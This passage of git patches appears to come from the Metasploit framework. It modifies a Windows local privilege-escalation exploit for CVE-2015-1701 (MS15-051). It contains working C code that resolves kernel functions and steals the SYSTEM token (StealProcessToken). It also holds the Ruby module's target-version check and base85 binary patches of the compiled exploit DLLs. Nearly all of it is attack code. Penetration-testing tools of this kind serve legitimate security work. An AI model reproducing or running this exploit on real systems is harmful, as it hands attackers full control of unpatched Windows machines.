-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
-
 		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
-		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
+		g_pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
 
+		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
+		g_pPsReferencePrimaryToken = (lPsReferencePrimaryToken)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
+		bSuccess = TRUE;
 	} while (cond);
 
 	if (MappedKernel != NULL) {
@@ -293,7 +284,39 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 		HeapFree(GetProcessHeap(), 0, miSpace);
 	}
 
-	return FuncAddress;
+	return bSuccess;
+}
+
+PSHAREDINFO GetSharedInfo(VOID) {
+	HMODULE	huser32;
+	PSHAREDINFO pSharedInfo = NULL;
+	DWORD dwCursor = 0;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return pSharedInfo;
+
+	pSharedInfo = (PSHAREDINFO)GetProcAddress(huser32, TEXT("gSharedInfo"));
+
+#ifndef _M_X64
+	PVOID pUser32InitializeImmEntryTable;
+
+	/* user32!gSharedInfo resoultion for x86 systems < Windows 7 */
+	if (pSharedInfo != NULL)
+		return pSharedInfo;
+
+	pUser32InitializeImmEntryTable = GetProcAddress(huser32, TEXT("User32InitializeImmEntryTable"));
+
+	for (dwCursor = 0; dwCursor < 0x80; dwCursor++) {
+		if ( *((PBYTE)pUser32InitializeImmEntryTable + dwCursor) != 0x50 )
+			continue;
+		if (*((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 1) != 0x68)
+			continue;
+		return *((PSHAREDINFO *)((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 2));
+	}
+#endif
+
+	return pSharedInfo;
 }
 
 /*
@@ -304,28 +327,22 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 * Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
 *
 */
-HWND GetFirstThreadHWND(
-	VOID
-	)
+HWND GetFirstThreadHWND(VOID)
 {
 	PSHAREDINFO		pse;
-	HMODULE			huser32;
 	PHANDLEENTRY	List;
 	ULONG_PTR		c, k;
 
-	huser32 = GetModuleHandle(TEXT("user32.dll"));
-	if (huser32 == NULL)
-		return 0;
-
-	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
-	if (pse == NULL)
+	pse = GetSharedInfo();
+	if (pse == NULL) {
 		return 0;
+	}
 
 	List = pse->aheList;
 	k = pse->psi->cHandleEntries;
 
-	if (pse->HeEntrySize != sizeof(HANDLEENTRY))
-		return 0;
+	//if (pse->HeEntrySize != sizeof(HANDLEENTRY))
+		//return 0;
 
 	//
 	// Locate, convert and return hwnd for current thread.
@@ -334,12 +351,11 @@ HWND GetFirstThreadHWND(
 		if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) {
 			return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT));
 		}
-
 	return 0;
 }
 
 // Search the specified data structure for a member with CurrentValue.
-BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+BOOL FindAndReplaceMember(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
 {
 	DWORD_PTR dwIndex, dwMask;
 
@@ -376,29 +392,25 @@ BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue,
 * Copy system token to current process object.
 *
 */
-NTSTATUS NTAPI StealProcessToken(
-	VOID
-	)
+NTSTATUS NTAPI StealProcessToken(VOID)
 {
-	NTSTATUS Status;
-	PVOID CurrentProcess = NULL;
-	PVOID SystemProcess = NULL;
+	void *pMyProcessInfo = NULL;
+	void *pSystemInfo = NULL;
+	PACCESS_TOKEN systemToken;
+	PACCESS_TOKEN targetToken;
 
-	Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess);
-	if (NT_SUCCESS(Status)) {
-		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
-		if (NT_SUCCESS(Status)) {
-			PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
-			PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
+	g_pPsLookupProcessByProcessId((HANDLE)g_OurPID, &pMyProcessInfo);
+	g_pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
 
-			// Find the token in the target process, and replace with the system token.
-			find_and_replace_member((PDWORD_PTR)CurrentProcess,
-				(DWORD_PTR)targetToken,
-				(DWORD_PTR)systemToken,
-				0x200);
-		}
-	}
-	return Status;
+	targetToken = g_pPsReferencePrimaryToken(pMyProcessInfo);
+	systemToken = g_pPsReferencePrimaryToken(pSystemInfo);
+
+	// Find the token in the target process, and replace with the system token.
+	FindAndReplaceMember((PDWORD_PTR)pMyProcessInfo,
+		(DWORD_PTR)targetToken,
+		(DWORD_PTR)systemToken,
+		0x200);
+	return 0;
 }
 
 
@@ -476,9 +488,9 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	}
 
 	g_OurPID = GetCurrentProcessId();
-	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
+	GetShellCodeFunctions();
 
-	if (g_PsLookupProcessByProcessIdPtr == NULL) {
+	if (g_pPsLookupProcessByProcessId == NULL) {
 		return;
 	}
 
diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
index 12b4a247d8..3ec8721cdb 100644
--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -26,9 +26,10 @@ class Metasploit3 < Msf::Exploit::Local
       },
       'License'         => MSF_LICENSE,
       'Author'          => [
-          'Unknown',    # vulnerability discovery and exploit in the wild
-          'hfirefox',   # Code released on github
-          'OJ Reeves'   # msf module
+          'Unknown',         # vulnerability discovery and exploit in the wild
+          'hfirefox',        # Code released on github
+          'OJ Reeves',       # msf module
+          'Spencer McIntyre' # msf module
         ],
       'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
       'Platform'        => 'win',
@@ -57,10 +58,15 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def check
+    # Windows XP SP3 (32-bit)                      5.1.2600.6514 (Works)
+    # Windows Server 2003 Standard SP2 (32-bit)    5.2.3790.5445 (Works)
     # Windows Server 2008 Enterprise SP2 (32-bit)  6.0.6002.18005 (Does not work)
-    # Winodws 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (64-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (64-bit)                       6.1.7601.17535 (Works)
     # Windows 7 SP1 (32-bit)                       6.1.7601.17514 (Works)
+    # Windows 7 SP1 (32-bit)                       6.1.7601.18388 (Works)
     # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.17514 (Works)
+    # Windows Server 2008 R2 (64-bit) SP1          6.1.7601.18105 (Works)
 
     if sysinfo['OS'] !~ /windows/i
       return Exploit::CheckCode::Unknown
@@ -76,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
-    return Exploit::CheckCode::Safe if build == 7601
+    return Exploit::CheckCode::Safe if build > 7601
 
     return Exploit::CheckCode::Detected
   end
@@ -86,7 +92,8 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
+    check_result = check
+    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
       fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 

From ae41f2bfa0da0db955fd533ca67ccb842e0c0433 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 25 Jun 2015 09:28:38 +1000
Subject: [PATCH 0551/1013] Update exploit binaries for ms15-051

---
 .../CVE-2015-1701/cve-2015-1701.x64.dll       | Bin 84992 -> 84992 bytes
 .../CVE-2015-1701/cve-2015-1701.x86.dll       | Bin 72192 -> 72192 bytes
 2 files changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
index e049e41ec77c819496d5a1d2ccaaae216d5f11af..0aa4a0913bd4526902f38d476a7ebb3c51df7f4f 100755
GIT binary patch
delta 4483
zcmd6qk5^P>8pq#vU<}1^@W)M*AI|2ekeDM-jRJ}ab|*o{#66^xL!eSeTM}?59h+eR
zak$JzU0tZ$jap8%MlN<ujNBT6%|ThUtP_@dsw3N>#j{~jk!5$k&)jSKFKp+0`F!8!
z{r$ereaCz)Mqi7uX)L1GE<N>Qe#8$3gS?tMxLZERFLSr@xZ$~R+$Ia-i}_jkxA?nV
zxj4Rw&pyu>TWmMi{uLAhc~(nTBxg(&E}URY3e^S8wFl+KXvf5DD2vjFSQo4;lD~+)
zb<M%IC~#Jc_`B#g4rOulx!!p*6xhQN{UjW{MA5oWE2pW#53qSsPud5f6jFuDR0<rj
z+6;`zSrg;DV$GE#F<{EV$g1#hxLdHwDAx2Q^@suCuJD8*DvIhHH>&&f|ES;4JF2Rt
z_0jrLMadZ@N-Rgpj><>*wmiwS4oeXOD`N5%i(^$rpPg4u71eIBCK&6;2<`kTEr?+S
znkLd=?#y|2irD>mj2PWL{8hhvX=0`$dp+i`NT!^%7^bGwY776hW5@!lO%?u_Nuw87
z?Qcfn7*!!aWhsxU8gy$Hr2$p&$mJ$s-XpYBn$fbUN81AJpeAbv+OjJ1&=aUXWh|19
znk;uO4EGl-VO$jJV}@S)Syl5S<JRzngt~r0V^y$+OJ~Ak;&iUcQIl5jZ{)R;61;=g
zRkeEWm7@uand^6lFZVBR&_#uY9zf^Zw87e-xvn@|(Si!xTRvw)2T_-|c+S!c&djwd
zQHvD^JXTl0>6A`iJ1ho_7qAe2fz{Q;yr}IH{W;b$Rmi7%Ln66Ef36R$HkxQ@{@hko
zSdA)k=fGCVs&6RYq&4omK){Z{m*e!JM89cd31<!|zc4qDW6c(;yE{;a@cRfOCyy~k
zeGiBG8c)jG%vSFvtis%RL9CC;P3z0WBK;;0TBr5p_)D!x^v9wKhmSK>leGtNE=prn
z6CBdnp`AFFVH5IAzyejF8H0;;YULs^kl&#VmG*%uw4$dpRx_qn#!`hU)FYs|D!97o
zYSlS&=NX6eu_|mpfD)QfLhlH~E&Jc)s;4V&t+{TjvS4`~i#emboaXRH4Vw{o9svig
z<J1jRJ%J4)xsdYx{mKI|ZJf)pVaoUX&+_#tqdZmqdTJcMRf(Q<BZ422$H%UoA+}Td
z)lsTHV)&M!jgxQ{pGxOcAzRrIdp9?X9hP63(QK$cEH9fG%eTmdGrRbU%G9{coUc$S
z;@5NjoqQ@Gfe*<4N?5S+#g{PH;#;Z=!<WU3pLaeaN@i6!NI_{JtxpwxN7jFfdO?&-
zf5Nw*3T~|u<$d9DnY<xU;)BW;iQ}VqmpnXo9d{{N^BUv$HRbe*bw>V-951e)obRER
zU<BPZ&7onkWS_V<v2za%Zyd1FdGxEo%i(f_7{K;~XXQA@7M?CwJDmKo{DH&D-;=+0
zWbg(h?cTdMUoSth`UpRy%*gx9IJ12xy<S5fjUq!MhCdo=hY5dxvNGkqi!r=UzVc8e
z_sGd5qIYF6CJhLAKHB9OOuytB<%7pXWjs@}wff9o>Te6z7u~Fn(CX8Fsh<$8&%9ZG
znT+2Ui735J7R;5TwN-`bE+&tZjN@<1-<K@o`{cVzt&@wx9ZkFOg@l*9PTpR+A@j%0
zTK8o2JTjODnuWvr_9~(oXDg?w!Y6tIynN@hHj?Q*RI5Tzxl#Jjr06aueLYnZR3W7N
zvtpOQlDvjKTl%0rL&By7k^JLxYX{A>eJHBJ6s2O<E<^NNt8tVg!zNWYs*JjmBY3@>
z=qcc-N`+^01XAgO_f;PKpB3S;ku33wzxqqgzg5a>7V~Ij+08kx%ExM-=i`-vx>5UN
z*CNVt#wv9-$i;6jTU3;)MIY5!tMh=)Hl4?G_I6HA;M@4}9KCGQnW%Gu&hPYD26dj-
zc~a*Q<*^_>vxe?Oxx718d8K>ry6N~4jKrS!O^!3Laj6DdvwbSJ<8(S7oywO+(Qj>Y
zXB;mUT4^Z!l)7!&7HD(M<^}P*<o|82&2J|1gPldQ_%3dm#dF;cS2}n8resS+Md$k#
zULWTzjAd*hK1mnY1X<x*z-v$nyln<!&qC?&tzZw73EvNzXEK%p9}C9E;{%7cf}5c2
z@Z})G&yX8F20R6M;6vcNS&aGSa4$=O*#dRU<*W?cZ(*zzjfe%eVNvrC2cMhGSP1b$
z-~g0@IPoXl6Q8i+8WwQo16RyJ9opxBJrK3;1&5%PB>dok$#cD0Mao=sfT&Rp*f38U
zs1bY}3U>xKCTYG5RCIp~oR+LDl$a0EBFexUw=-tL#@KwuED%kc0^WZIV=lytyfEh=
z+WmR3XCY%j_+C(2gdBr!1pk)G*cJF7cmrZsC`)6k9g2b{wx;7`QgBV6=}s&P@fffg
zvcQjmv+mLsVF9;8UfLO%txL3>m4i>}z6tEmJ#k?M@&N5^;9=djg9|eCI9LXScMrDe
zo>;vU`GLN*U<jf%pqH&(rX8IVG-YD|G>QQqgXmOZmos(*pC;u&!Ai#Zpf>n^@Qxg9
zARAZ+(eV;luC^KCUdWA8@qv?8Y2(CzSMOoWp5(=`z#I`7>&2iQ;OM<b5_sZ^`HaP4
z&^GW7Ymkuet)OwOb{$dRT&NrqB!MLmEus{BS@#3rJ@?`9LtF&QAZkNA?!_NEiWA^~
zUg2BM*gv3FG-3set%Smf39i|Ig(B_*w?W~7z!xAIrw#0ZM$x7h`~spjgW&XEYvUAx
zQXwTRXWkB&4<QkS&%rUs3D54wYX}v<$AFWeLilN5J4BNaFF`Z`ars7lp<tEnhrr@Z
zj1{4;8@ve7W=6o4BHVvDDqz@}2ekWkg0mmgycK*KqRE2b>CHGswC@M)F5EK)BBqvV
z@pRC#jj=|wAs&Z3@F&1K9>&SR+rW0{7<~J~UL+I>w1a+d;Un7Wvcb*J2pW}x&u+)b
zz_)?PJG3?_V6*OzfxbtzI57y(n8dWl@DQPII=BO(xCeZnycdNJVIJJ6eL^nqX^0vf
z0B2Vq0dME53H;X0SQ7jgnE1HX#sYeE?*scGI$mP#ZtWBcz$JSSN8e0v5ZVq;^v?G%
zb^wKJ@b}OO_$KfoL<3y{U)zfvA>IKN;KV}k#Q8qlKYR*ks%9*5K5_-*e!P0{k>C>$
zU7rv95-LEPHQ=`Za?i*6AA)g7xHD7`Cp6;D;3tAUh)$v%{2HR~cm%vNpm{rZ2BLSO
zA53@>8$jPAuo|L8*Mj#n;Uz^}1PxDV3yK6Yp299@mzgLOK{Oe$85%=}7I53s_*5`)
z8MshJ(!rkx_dSE_fZq=;eO~j~;0rI~r9-?83_&ywan&o@J0XH&uQGNLZN|JXS6{=g
z9txx2@DaRj@K?b64(&a6g1<V7WJKHw7QT)*A4lo}zk}#hn8H{#<bxN%QxL^3fj_^2
zuLAAaamIE-6!(B<@xNzYJ1RzC(%-}z08dmQx--^=hX|^KKM&Twg;Rpx50;$7HNlsH
znWu1l@J?_S^a`$n_>S(01G*<()jjBCLP+aCwCSFhuY2NF-Is$+x+k{jp7^friT~C;
qF``c!pBS%u;+<iSf5(x@(<_Ljx+m_{J@J6%<!(bmCtt-?<9`8N|G>lm

delta 4585
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

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
index 2dd92ae5f5b1745e9b24f20a7b13ba0d347a5716..6fe8681520f2ea1229333f023ddabcc3d4303d99 100755
GIT binary patch
delta 11536
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
